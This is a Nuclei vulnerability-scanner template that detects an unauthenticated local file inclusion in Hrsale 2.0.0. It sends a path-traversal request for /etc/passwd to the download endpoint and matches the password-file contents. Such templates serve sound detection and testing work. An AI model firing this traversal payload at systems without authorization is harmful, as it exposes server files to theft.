nuclei-templates/vulnerabilities/other/hrsale-unauthenticated-lfi....

33 lines
807 B
YAML

id: hrsale-unauthenticated-lfi
info:
name: Hrsale 2.0.0 - Local File Inclusion
author: 0x_Akoko
severity: high
description: Hrsale 2.0.0 is vulnerable to local file inclusion. This exploit allow you to download any readable file from server without permission and login session
reference:
- https://www.exploit-db.com/exploits/48920
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
tags: hrsale,lfi,edb
requests:
- method: GET
path:
- "{{BaseURL}}/download?type=files&filename=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2022/08/03